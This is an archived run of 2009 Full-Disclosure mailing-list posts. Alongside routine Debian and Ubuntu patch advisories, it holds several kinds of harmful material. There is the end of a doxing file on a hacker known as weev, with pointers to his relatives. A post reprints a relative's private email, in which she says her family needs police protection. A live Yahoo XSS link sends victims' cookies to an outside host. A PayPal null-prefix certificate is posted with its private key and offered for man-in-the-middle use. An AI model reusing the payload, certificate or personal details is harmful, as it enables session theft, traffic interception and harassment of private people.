(http://www.imagehuge.com/out.php/i16156_dad.jpg) / > > > > > (http://images.imagenonline.com/img_a190870.jpg) > > > > > > > > > > Not posting name or pictures of the brother and sister in law > > > > > again. > > > > > > > > > > Other pertinent information > > > > > =============================- > > > > > Meltdown post after his public naming: > > > > > - Source: http://weev.livejournal.com/368013.html > > > > > - Archival: http://www.webcitation.org/5jnP71qsD > > > > > > > > > > Also weev posts his IRL name+handle on > > > > > - > > > > > http://www.jimgilliam.com/2004/08/oreillys_smear_campaign_in_quickti > > > > > me.php. > > > > > - Archival: http://www.webcitation.org/5jnPc0pNy > > > > > > > > > > http://whois.domaintools.com/sealpac-usa.com > > > > > - Archival: http://www.webcitation.org/5jnT7EULI > > > > > - Related to http://www.sealpacusa.com? > > > > > > > > > > Weev online > > > > > ============================== > > > > > - http://www.encyclopediadramatica.com/index.php/weev > > > > > - http://weev.livejournal.com > > > > > - http://the-iprophet.org > > > > > - http://theiprophet.blip.tv > > > > > - http://www.weev.net > > > > > > > > > > Email > > > > > ============================= > > > > > - gluttony at gmail.com > > > > > > > > > > Legal Notice > > > > > ============================= > > > > > - http://tips.fbi.gov > > > > > > > > > > You don't have to give your identity if you don't want to (even > > > > > if you're a victim). You have a right to an attorney if you wish to > > > > > speak with them above weev. If you don't want them to know your > > > > > linkage with weev, send anonymous tip + some form of evidence (best > > > > > you can muster) to substantiate the lead > > > > > > > > > > Licensing > > > > > ============================= > > > > > This document is licensed under the GFDL. Open source > > > > > intelligence. > > > > > http://www.gnu.org/copyleft/fdl.html > > > > > > > > > > History > > > > > ============================= > > > > > 10 / 3 / 2009 - Initial revision by GOBBLES Security > > > > > > > > > > _______________________________________________ > > > > > > > > > > > > > Full-Disclosure - We believe in it. > > > > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > > > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > > > _______________________________________________ > > > > Full-Disclosure - We believe in it. > > > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > > > > > > > > > > > > > > > > > > > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091005/1919cdf6/attachment-0001.html From laurent.gaffie at gmail.com Mon Oct 5 07:38:50 2009 From: laurent.gaffie at gmail.com (laurent gaffie) Date: Mon, 5 Oct 2009 02:38:50 -0400 Subject: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. In-Reply-To: References: <20090909150422.B6C30B806E@smtp.hushmail.com> <8a6b8e350909092156j6ae14d71sd0a13db3b7a67579@mail.gmail.com> <4AA8FD6D.2030000@seapine.com> <4b13609c0909110632u13446d59jf3f9b47b5ff2b6de@mail.gmail.com> <4AADC044.30206@procyonlabs.com> Message-ID: <4b13609c0910042338s483d44bgfa4115871ac8b2b1@mail.gmail.com> More explication on cve-2009-3103 http://g-laurent.blogspot.com/2009/10/more-explication-on-cve-2009-3103.html -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091005/4b2dc1e8/attachment.html From mrxisaplant at hush.com Mon Oct 5 10:38:11 2009 From: mrxisaplant at hush.com (TheLearner) Date: Mon, 05 Oct 2009 09:38:11 +0000 Subject: [Full-disclosure] (No subject) legal threat from Alyse Auernheimer Message-ID: <20091005093811.C13AD28039@smtp.hushmail.com> Sorry about leaving sealpac in there, we're working on correcting that. I'll put a notice in the next one. For the record, the post made in an earlier version of Andrew Auernheimer's infodoc states weev has an affiliation with sealpac. This is incorrect because weev just took the domain name and failed to give it back. Since you find is necessary to forward this correspondence to the FBI, I'll make it public here for you. It's almost like you're fishing to be a victim or something. It's pathetic. If it means anything: No one has made any threats to you. No one is going to harm you. No one has any ill-sentiment towards your family. You've been done a favor by having your relationship with weev clarified on here. You got your correction, you got your post down, quit being melodramatic. On Mon, 05 Oct 2009 07:50:20 +0000 Alyse Auernheimer wrote: Return-Path: Received: from smtp7.hushmail.com (smtp7.hushmail.com [65.39.178.136]) by imap12.hushmail.com (Cyrus v2.3.7-Invoca-RPM-2.3.7-2.el5) with LMTPA; Mon, 05 Oct 2009 07:50:29 +0000 X-Sieve: CMU Sieve 2.3 Received: from mail-ew0-f224.google.com (mail-ew0-f224.google.com [209.85.219.224]) by smtp7.hushmail.com (Postfix) with ESMTP for ; Mon, 5 Oct 2009 07:50:21 +0000 (UTC) Received: by ewy24 with SMTP id 24so11122764ewy.22 for ; Mon, 05 Oct 2009 00:50:21 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message- id:subject :from:to:content-type; bh=O+UD/WD8lCH2KA1S8ZiYbDmjoHo36/uRUHWULElbv7c=; b=N9iZNiKyHiM6Sso//SeBju/siqip/Kl3QGZ1kBFI6HY0Npx0TU4suw4PixASzY5EdO Mfq8Gc6SEQAaPBmtRv+EPoCENWkaKMg21oRkzgaCwZ90QFnfu7K/H4mfuZHkXehS9irP XL273nm8NSog6o7XfyATtsN+2TVdFvwYC6B0w= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=HfCFSLplV0dZpvp5Pmk5aqBRGbsW4KwixRJ0KmZHItZhIJkeVGLWeHMPqyBtE3nkg5 4XlDiotqE/V0398MMiRyzreqiHrufXjkTdzAYnK1KBHA1pBje2dtlM6l/ICwS+fuLiLt 9HubIoKXLS126A9FQOYCxML9lQ1qG/DdROv8I= MIME-Version: 1.0 Received: by 10.216.87.144 with SMTP id y16mr622378wee.95.1254729020908; Mon, 05 Oct 2009 00:50:20 -0700 (PDT) Date: Mon, 5 Oct 2009 03:50:20 -0400 Message-ID: <4f8170520910050050v1d44b4d8p6ad4202ac4dc5177 at mail.gmail.com> Subject: From: Alyse Auernheimer To: TheLearner Content-Type: multipart/alternative; boundary=0016e6d7852e94a5d104752b5dda Lisa, Please do not link Andrew Auernheimer with our business, Sealpac USA, he has nothing to do with it except he is holding our domain name hostage. We are planning on pursuing a court order to have it released. All of our emails concerning this subject will now be forwarded to the FBI as it may potentially impact our business. The individuals who say they are trying to help us are now causing more harm to us than Andrew himself. We are advised to have our home watched by law enforcement and our daughter's dorm. This is just wrong. Thank You for you consideration. Alyse From iuculano at debian.org Mon Oct 5 05:08:58 2009 From: iuculano at debian.org (Giuseppe Iuculano) Date: Mon, 5 Oct 2009 15:08:58 +1100 (EST) Subject: [Full-disclosure] [SECURITY] [DSA 1901-1] New mediawiki1.7 packages fix several vulnerabilities Message-ID: <20091005040858.4C06584893A@hannah.localdomain> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1901-1 security at debian.org http://www.debian.org/security/ Giuseppe Iuculano October 05, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : mediawiki1.7 Vulnerability : several vulnerabilities Problem type : remote Debian-specific: no CVE IDs : CVE-2008-5249 CVE-2008-5250 CVE-2008-5252 CVE-2009-0737 Debian Bugs : 508868 508869 508870 514547 Several vulnerabilities have been discovered in mediawiki1.7, a website engine for collaborative work. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2008-5249 David Remahl discovered that mediawiki1.7 is prone to a cross-site scripting attack. CVE-2008-5250 David Remahl discovered that mediawiki1.7, when Internet Explorer is used and uploads are enabled, or an SVG scripting browser is used and SVG uploads are enabled, allows remote authenticated users to inject arbitrary web script or HTML by editing a wiki page. CVE-2008-5252 David Remahl discovered that mediawiki1.7 is prone to a cross-site request forgery vulnerability in the Special:Import feature. CVE-2009-0737 It was discovered that mediawiki1.7 is prone to a cross-site scripting attack in the web-based installer. For the oldstable distribution (etch), these problems have been fixed in version 1.7.1-9etch1 for mediawiki1.7, and mediawiki is not affected (it is a metapackage for mediawiki1.7). The stable (lenny) distribution does not include mediawiki1.7, and these problems have been fixed in version 1:1.12.0-2lenny3 for mediawiki which was already included in the lenny release. The unstable (sid) and testing (squeeze) distributions do not include mediawiki1.7, and these problems have been fixed in version 1:1.14.0-1 for mediawiki. We recommend that you upgrade your mediawiki1.7 packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Debian (oldstable) - ------------------ Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7_1.7.1-9etch1.dsc Size/MD5 checksum: 911 7db727bfa3f6139e107af451a90df719 http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7_1.7.1.orig.tar.gz Size/MD5 checksum: 3256428 50b74e2b5c86fb94c7201b72d2037662 http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7_1.7.1-9etch1.diff.gz Size/MD5 checksum: 46880 f939cc99afd3ff4b330a35ce549fdd7e Architecture independent packages: http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7_1.7.1-9etch1_all.deb Size/MD5 checksum: 3341486 4d801e5ee141c2affd080437cafa7f0f alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7-math_1.7.1-9etch1_alpha.deb Size/MD5 checksum: 180506 526bd0d52438515635abc44afea9e618 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7-math_1.7.1-9etch1_amd64.deb Size/MD5 checksum: 137638 b63b1cd4bc45683507e765b5af1aea12 arm architecture (ARM) http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7-math_1.7.1-9etch1_arm.deb Size/MD5 checksum: 140018 a9431b5e427703486a814ed2a7442d62 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7-math_1.7.1-9etch1_hppa.deb Size/MD5 checksum: 42988 0a7a434f0fcc81b7d8d5e80137ca6569 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7-math_1.7.1-9etch1_i386.deb Size/MD5 checksum: 122238 cc04873698abdbf03011336f533c2b06 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7-math_1.7.1-9etch1_ia64.deb Size/MD5 checksum: 231730 e3201066e1de24dc9a13d284ea4b685f mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7-math_1.7.1-9etch1_mips.deb Size/MD5 checksum: 42978 e92b925866416643905a835ab0a5ae2b mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7-math_1.7.1-9etch1_mipsel.deb Size/MD5 checksum: 42986 8c6b53cdf4af706debdc7eed12ae585b powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7-math_1.7.1-9etch1_powerpc.deb Size/MD5 checksum: 140584 47487edcc395a3a559e0d9eab8be653c sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7-math_1.7.1-9etch1_sparc.deb Size/MD5 checksum: 143132 5e59318af766a1ede67f62ffd1843597 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAkrJcN4ACgkQ62zWxYk/rQe9nwCfS2e4dT1eTyvpG8ALJLtELncF 7ZEAn2HauMGHglvHK+98oAWZjzuR96LH =FFQG -----END PGP SIGNATURE----- From cconfirm at gmail.com Mon Oct 5 13:49:13 2009 From: cconfirm at gmail.com (Pasca) Date: Mon, 5 Oct 2009 15:49:13 +0300 Subject: [Full-disclosure] Yahoo cookie stealer Message-ID: Found in the wild: http://funny.byethost16.com Redirects to: http://kr.gugi.yahoo.com/myBook/myregion.php?func_mode=loginAction&targetUrl=javascript:document.location=String.fromCharCode(104,116,116,112,58,47,47,102,117,110,110,121,46,98,121,101,116,104,111,115,116,49,54,46,99,111,109,47,105,110,100,101,120,46,112,104,112,63,105,115,114,61).concat(escape(document.cookie)); From jmm at debian.org Mon Oct 5 18:28:16 2009 From: jmm at debian.org (Moritz Muehlenhoff) Date: Mon, 5 Oct 2009 19:28:16 +0200 Subject: [Full-disclosure] [SECURITY] [DSA 1902-1] New elinks packages fix arbitrary code execution Message-ID: <20091005172816.GA16738@galadriel.inutil.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1902-1 security at debian.org http://www.debian.org/security/ Moritz Muehlenhoff October 05, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : elinks Vulnerability : buffer overflow Problem type : local(remote) Debian-specific: no CVE Id(s) : CVE-2008-7224 Debian Bug : 380347 Jakub Wilk discovered an off-by-one buffer overflow in the charset handling of elinks, a feature-rich text-mode WWW browser, which might lead to the execution of arbitrary code if the user is tricked into opening a malformed HTML page. For the old stable distribution (etch), this problem has been fixed in version 0.11.1-1.2etch2. The stable distribution (lenny) and the unstable distribution (sid) already contain a patch for this problem. We recommend that you upgrade your elinks package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2.diff.gz Size/MD5 checksum: 30564 48727476dbfed45200797a0504fa6e4a http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1.orig.tar.gz Size/MD5 checksum: 3863617 dce0fa7cb2b6e7194ddd00e34825218b http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2.dsc Size/MD5 checksum: 872 870acbbc16c166c0e17669f435cf4478 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_alpha.deb Size/MD5 checksum: 496748 65a9e90caf0005912d0f307447bb7252 http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_alpha.deb Size/MD5 checksum: 1264746 750b9c9425d331afdd84ae9e8ec397cc amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_amd64.deb Size/MD5 checksum: 457658 d35d0729240a9a3e4edf596fab8b5519 http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_amd64.deb Size/MD5 checksum: 1219062 eeb677af4bd1f969062dcc49a6c5797f arm architecture (ARM) http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_arm.deb Size/MD5 checksum: 1179258 2236eef0018c35106157254f1a9b5371 http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_arm.deb Size/MD5 checksum: 417026 d6298439e61cfd390dc5f885fa6d3ce9 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_hppa.deb Size/MD5 checksum: 1249718 200ea460bf1c50c7c77fb818b99d6f93 http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_hppa.deb Size/MD5 checksum: 481296 4d1ffd49415dc0f727fec71843e0cf1e i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_i386.deb Size/MD5 checksum: 423782 fd2bdd5f8d85049dd34e9d392cfb0d55 http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_i386.deb Size/MD5 checksum: 1188386 6b5bd5cc0801cc98c5f89eb755036a58 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_ia64.deb Size/MD5 checksum: 1432996 3f1c8fd354685e153aa0bf6001811f72 http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_ia64.deb Size/MD5 checksum: 624264 6ab1d3d6329c2fbbd366c7979846be04 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_mipsel.deb Size/MD5 checksum: 1223924 88dab6a6625382e7d7531f9f45f2fb6d http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_mipsel.deb Size/MD5 checksum: 466916 3f54531dc562935768748e8626c3cd8a powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_powerpc.deb Size/MD5 checksum: 450082 4cb3cbeda69cd02ddc99b132d26998c5 http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_powerpc.deb Size/MD5 checksum: 1216856 ed85e75381a7bfdd094e21e0e16ecbfd s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_s390.deb Size/MD5 checksum: 1232366 5eafbb1dcf688fe54bd347afab8d6da8 http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_s390.deb Size/MD5 checksum: 470580 9da53a0cc795e3943c250a44810f006d sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_sparc.deb Size/MD5 checksum: 419686 6177d561615f0c17f9e46e3642899870 http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_sparc.deb Size/MD5 checksum: 1186370 1f7db95ad501df7b756e3ccaf2dc754d These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAkrKLEAACgkQXm3vHE4uylpXOACgy94wa4gsQtxO/emAzsvdqWfU UTIAoJJATXsEq2GO6BrEBTE/UVIVWZib =VSyK -----END PGP SIGNATURE----- From timjonesowns at yahoo.com Mon Oct 5 18:59:31 2009 From: timjonesowns at yahoo.com (Tim Jones) Date: Mon, 5 Oct 2009 10:59:31 -0700 (PDT) Subject: [Full-disclosure] null-prefix certificate for paypal Message-ID: <423708.79999.qm@web112906.mail.gq1.yahoo.com> If there's really a Moxie Marlinspike fan club [1], I'm definitely a member..? Attached is one of the null-prefix certificates [2] that he distributed during his "intercepting secure communication" training at Black Hat.? This one's for www.paypal.com, and since the Microsoft crypto api appears to remain unpatched, it works flawlessly with sslsniff [3] against all clients on Windows (IE, Chrome, Safari).? Also, because of Moxie's attacks against OCSP [4], I don't think this certificate can be revoked. Enjoy! [1]: http://www.linuxtoday.com/security/2009100102035NWNT [2]: http://www.thughtcrime.org/papers/null-prefix-attacks.pdf [3]: http://www.thoughtcrime.org/software/sslsniff/ [4]: http://www.thoughtcrime.org/papers/ocsp-attack.pdf -----BEGIN CERTIFICATE----- MIIGRDCCBa2gAwIBAgIDAPCbMA0GCSqGSIb3DQEBBQUAMIIBEjELMAkGA1UEBhMC RVMxEjAQBgNVBAgTCUJhcmNlbG9uYTESMBAGA1UEBxMJQmFyY2Vsb25hMSkwJwYD VQQKEyBJUFMgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkgcy5sLjEuMCwGA1UEChQl Z2VuZXJhbEBpcHNjYS5jb20gQy5JLkYuICBCLUI2MjIxMDY5NTEuMCwGA1UECxMl aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEuMCwGA1UEAxMl aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEgMB4GCSqGSIb3 DQEJARYRZ2VuZXJhbEBpcHNjYS5jb20wHhcNMDkwMjI0MjMwNDE3WhcNMTEwMjI0 MjMwNDE3WjCBlDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCkNhbGlmb3JuaWExFjAU BgNVBAcTDVNhbiBGcmFuY2lzY28xETAPBgNVBAoTCFNlY3VyaXR5MRQwEgYDVQQL EwtTZWN1cmUgVW5pdDEvMC0GA1UEAxMmd3d3LnBheXBhbC5jb20Ac3NsLnNlY3Vy ZWNvbm5lY3Rpb24uY2MwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBANJp+m86 ALQhG8ixAtc/GbLEbbRU+IuKzNtywp48YLnGkT2Ct32Z/9EphMFzU5yC3fwkjHfV QfPoHkKhrS2e/1sQJs6dVxdzFiM4yNbxuqOWWxZnSk9zlzpNFKT04j+LBYNC0dDc L3rlthCyEcDcISqQ/66XcVpJgaxA8zu4WbJPAgMBAAGjggMhMIIDHTAJBgNVHR ME AjAAMBEGCWCGSAGG+EIBAQQEAwIGQDALBgNVHQ8EBAMCA/gwEwYDVR0lBAwwCgYI KwYBBQUHAwEwHQYDVR0OBBYEFGGPYTRDVRR/JwnOTIvqm3sZJbxuMB8GA1UdIwQY MBaAFA4HYNQ5yRtbXZB7I8jSNJ1KmkY5MAkGA1UdEQQCMAAwHAYDVR0SBBUwE4ER Z2VuZXJhbEBpcHNjYS5jb20wcgYJYIZIAYb4QgENBGUWY09yZ2FuaXphdGlvbiBJ bmZvcm1hdGlvbiBOT1QgVkFMSURBVEVELiBDTEFTRUExIFNlcnZlciBDZXJ0aWZp Y2F0ZSBpc3N1ZWQgYnkgaHR0cHM6Ly93d3cuaXBzY2EuY29tLzAvBglghkgBhvhC AQIEIhYgaHR0cHM6Ly93d3cuaXBzY2EuY29tL2lwc2NhMjAwMi8wQwYJYIZIAYb4 QgEEBDYWNGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS9pcHNjYTIwMDIvaXBzY2EyMDAy Q0xBU0VBMS5jcmwwRgYJYIZIAYb4QgEDBDkWN2h0dHBzOi8vd3d3Lmlwc2NhLmNv bS9pcHNjYTIwMDIvcmV2b2NhdGlvbkNMQVNFQTEuaHRtbD8wQwYJYIZIAYb4QgEH BDYWNGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS9pcHNjYTIwMDIvcmVuZXdhbENMQVNF QTEuaHRtbD8wQQYJYIZIAYb4QgEIBDQWMmh0dHBzOi8vd3d3Lmlwc2NhLmNvbS9p cHNjYTIwMDIvcG9saWN5Q0xBU0VBMS5odG1sMIGDBgNVHR8EfDB6MDmgN6A1hjNo dHRwOi8vd3d3Lmlwc2NhLmNvbS9pcHNjYTIwMDIvaXBzY2EyMDAyQ0xBU0VBMS5j cmwwPaA7o DmGN2h0dHA6Ly93d3diYWNrLmlwc2NhLmNvbS9pcHNjYTIwMDIvaXBz Y2EyMDAyQ0xBU0VBMS5jcmwwMgYIKwYBBQUHAQEEJjAkMCIGCCsGAQUFBzABhhZo dHRwOi8vb2NzcC5pcHNjYS5jb20vMA0GCSqGSIb3DQEBBQUAA4GBAGjueZeX3Tvv FmoG8hSabs2eEveqgxC90XyY+seu1A4snjgFnVJgqZkKgbSYkB2uu0rXudyInjd4 QVv3gqXyukElWpAaHkU4oVJYdZQmRPsgB7pEzOVKLXI/mEf2JtwFRgUHYyGrRpuc eNVUWz0MHshkjLVQI4Jv27giHEOWB6i7 -----END CERTIFICATE----- -----BEGIN RSA PRIVATE KEY----- MIICXQIBAAKBgQDSafpvOgC0IRvIsQLXPxmyxG20VPiLiszbcsKePGC5xpE9grd9 mf/RKYTBc1Ocgt38JIx31UHz6B5Coa0tnv9bECbOnVcXcxYjOMjW8bqjllsWZ0pP c5c6TRSk9OI/iwWDQtHQ3C965bYQshHA3CEqkP+ul3FaSYGsQPM7uFmyTwIDAQAB AoGAcqDnnOaVcYxD7Z55NLgckOYv+bj8ulCAb+DiI4AzFaIWh9MJkXRvCAy9VQI1 /6LPukhS+gmE55KBwb0AckUXSRC4DuPXOhgT6ywyEJGQp6IdaQmC4NoyC+G4GPnr h0YISVKTT1ppRgjF6tpaFvElGTse+yejtKAssduT45MoxGkCQQDx58UFfPCVwAho J7/4TXpEebYs/BuLKYwQKUuQe1B+dV2WtSaub+jbSSpRVScTpyfKRwN0w4UZzs/6 4Zzs/erbAkEA3qx8uhMy7Dxu8zWx+C1b5LSh4Rf4sCvXug/nx3opvahO89iP5P6L MVplaVsVPwligUEaMsx9rJEJvt48sMEenQJBAOQlE6MOZ5TETOl2e84BvEuygodA qfWAlLF1UOgN9SefJ0oIxVeFAhc2lOuqJLWbU6KpgO/xqqlhbLOPbsHw5DsCQDj0 j5acsIrCTnLBCjt7hqSyGzHTCtYs8KnzxYo9Ug3jzgYLH4soHHxMLeJL3NxZzytW dpgFvCN2mbKLb6SaUPUCQQCKjbXoN7DkBbk8wU0ZY5fGCtLEUHtEmT93nFgmUvQ3 ZSB/EvhtWRPcWGdRC5tj0YxaUFevVhZA/Ng1d1JzbcKB -----END RSA PRIVATE KEY----- -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091005/1dbd6b6e/attachment.html From kees at ubuntu.com Mon Oct 5 22:34:38 2009 From: kees at ubuntu.com (Kees Cook) Date: Mon, 5 Oct 2009 14:34:38 -0700 Subject: [Full-disclosure] [USN-841-1] GLib vulnerability Message-ID: <20091005213438.GP7496@outflux.net> =========================================================== Ubuntu Security Notice USN-841-1 October 05, 2009 glib2.0 vulnerability CVE-2009-3289 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.04 LTS: libglib2.0-0 2.16.6-0ubuntu1.2 Ubuntu 8.10: libglib2.0-0 2.18.2-0ubuntu2.2 Ubuntu 9.04: libglib2.0-0 2.20.1-0ubuntu2.1 After a standard system upgrade you need to restart your session to effect the necessary changes. Details follow: Arand Nash discovered that applications linked to GLib (e.g. Nautilus) did not correctly copy symlinks. If a user copied symlinks with GLib, the symlink target files would become world-writable, allowing local attackers to gain access to potentially sensitive information. Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/glib2.0_2.16.6-0ubuntu1.2.diff.gz Size/MD5: 36482 5a747f19839228824de8b801306697b1 http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/glib2.0_2.16.6-0ubuntu1.2.dsc Size/MD5: 1168 b073d48a3ef03f58d58a647ba6bc5152 http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/glib2.0_2.16.6.orig.tar.gz Size/MD5: 6491460 65c594a471406a377bee8171a2ea43d4 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-doc_2.16.6-0ubuntu1.2_all.deb Size/MD5: 1131446 3554e3c1d7ff9e967b2a70118ed269d0 http://security.ubuntu.com/ubuntu/pool/universe/g/glib2.0/libglib2.0-data_2.16.6-0ubuntu1.2_all.deb Size/MD5: 968 8b2ba86fa2ce1c1ce6f87449a29ba398 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-0-dbg_2.16.6-0ubuntu1.2_amd64.deb Size/MD5: 1177628 74b9bb38332276d8f27e84a2a989923c http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-0_2.16.6-0ubuntu1.2_amd64.deb Size/MD5: 824766 5d60a5bbee4bb5f5a503cf17b6b968d8 http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-dev_2.16.6-0ubuntu1.2_amd64.deb Size/MD5: 985446 30a551102c0dc05911b28d18f09094e2 http://security.ubuntu.com/ubuntu/pool/universe/g/glib2.0/libgio-fam_2.16.6-0ubuntu1.2_amd64.deb Size/MD5: 48396 5fbd8935fc8cdfbc87ddee9dd5ea906e http://security.ubuntu.com/ubuntu/pool/universe/g/glib2.0/libglib2.0-udeb_2.16.6-0ubuntu1.2_amd64.udeb Size/MD5: 1307488 0e797f76924ae31a0a54f596207c1c18 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-0-dbg_2.16.6-0ubuntu1.2_i386.deb Size/MD5: 1102278 322adce90ad9052eb05e97acb2bb3aed http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-0_2.16.6-0ubuntu1.2_i386.deb Size/MD5: 758442 d60d1a00d850acc2bf29301d2e708c94 http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-dev_2.16.6-0ubuntu1.2_i386.deb Size/MD5: 872458 21872fd8706eccc3260906e9e18b81f6 